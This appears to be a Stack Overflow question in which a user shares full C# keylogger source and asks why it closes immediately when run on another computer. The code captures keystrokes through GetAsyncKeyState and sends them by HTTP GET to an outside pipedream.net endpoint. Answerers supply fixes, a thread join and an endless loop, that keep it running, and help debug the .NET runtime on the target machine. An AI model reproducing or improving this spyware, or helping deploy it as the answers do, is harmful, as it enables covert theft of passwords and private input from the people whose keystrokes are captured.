# Why does it close?

Tags: c#, windows, console

So I am making a keylogger and I build it and ran it on my other computer to test it but it just closed immediately so I tried adding `Console.ReadLine();` that didn't work then I tried the `Console.ReadKey();` didn't work either.

I want so when u press the close button it closes no other way using a fricking key it's a KeyLogger god dangit

Btw it opens fine in Visual Studio

Heres the code:

```
using System.Threading;
using System.Runtime.InteropServices;
using System.Net;

namespace Program
{
    class Program
    {
        public bool islogging = false;
        public string loggedData = "";
        [DllImport("user32.dll")]
        public static extern short GetAsyncKeyState(int key);

        public void logKeyStrokes()
        {
            this.islogging = true;
            int key;
            while (this.islogging)
            {
                for (key = 8; key < 190; key++)
                {
                    if (GetAsyncKeyState(key) == -32767)
                    {
                        this.checkKeys(key);
                    }
                }
            }
        }

        public void checkKeys(int keyCode)
        {
            switch (keyCode)
            {
                case 8:
                    if (!string.IsNullOrEmpty(this.loggedData))
                    {
                        this.loggedData = this.loggedData.Substring(0, this.loggedData.Length - 1);
                    }
                    break;
                case 9:
                    this.loggedData += "    ";
                    break;
                case 13:
                    this.loggedData += " [ENTER] ";
                    break;
                case 16:
                    this.loggedData += " [SHIFT] ";
                    break;
                default:
                    this.loggedData += (char)keyCode;
                    break;
            }

            if (this.loggedData.Length >= 14)
            {
                HttpWebRequest req = (HttpWebRequest)WebRequest.Create("https://noneofyourfuckingbusiness.x.pipedream.net?" + this.loggedData);
                req.GetResponse();
                this.loggedData = "";
            }
        }
        public void threadKeyLogging()
        {
            new Thread(new ThreadStart(this.logKeyStrokes)).Start();
        }
        public static void Main()
        {
            Program p = new Program();
            p.threadKeyLogging();
            Console.WriteLine("");
        }
    }
}
```

Comment: `Console.WriteLine` will not pause the program. `Console.ReadLine()` (or `ReadKey`, etc) will pause and wait for user input.

Comment: `threadKeyLogging` just starts a new thread and then returns. Nowhere does it wait for the thread to complete...

Comment: @Rufus L , so how to fix it?

Answer (score 1):

Not sure this is the best way to do what you want (because it kind of defeats the purpose of starting a new thread if we're only starting one and then waiting for it to finish), but if you want to wait for a thread to complete, you can `Join` it, which will block the current thread until the joined one is done:

```
public void threadKeyLogging()
{
    var t = new Thread(this.logKeyStrokes);
    t.Start();
    t.Join();
}
```

Comment: It doesnt show the text from the Main() bit (I deleted the text cuz it's private and sat it to nothing)

Comment: I don't understand your comment. There is no text shown in `Main`. Also, I don't see anywhere that you set `this.islogging = false;`, so it seems that the thread would never finish?

Comment: "Console.WriteLine("");" I just removed the text in it

Comment: Ok. If you put text in there, it should show. This is assuming that the thread actually completes because `this.islogging` gets set to `false` somewhere. Does it?

Comment: it. doesnt get set to false..?

Answer (score 0):

You could add an endless loop at the end of your `Main`

```
public static void Main()
{
    Program p = new Program();
    p.threadKeyLogging();
    Console.WriteLine(""); //<- don't know why you have this line

    while (true);
}
```

Comment: So I tried that, now it works for my computer with .NET installed. I tried it on my other computer without .NET installed it just closes instantly.

Comment: @Lasse You can't run a .NET program if .NET is not installed. I am curious why you would need a keylogger in the first place? What problem are you trying to solve?

Comment: @Optimax, I downloaded .NET on my other computer still didn't work tho

Comment: @Lasse - you actually downloaded/installed .net and restarted your pc in under 30 minutes, pretty impressive. nevertheless the line should work regardless on what machine you are using the application, does the console application actually run? did you check event viewer?

Comment: @Rand Random wot event viewer

Comment: @Lasse Windows Event Viewer to see a possible error while loading your application? https://en.m.wikipedia.org/wiki/Event_Viewer

Comment: @RandRandom ok so I tried that and it said:

`Description: A .NET Core application failed.
Application: LAZ.exe
Path: C:\Users\lass2\source\repos\LAZ\LAZ\obj\Release\netcoreapp3.1\LAZ.exe
Message: A fatal error was encountered. The library 'hostpolicy.dll' required to execute the application was not found in 'C:\Program Files\dotnet'.
`

Comment: @Lasse Can’t help you with that a quick google search brought this https://stackoverflow.com/questions/38085430/the-library-hostpolicy-dll-was-not-found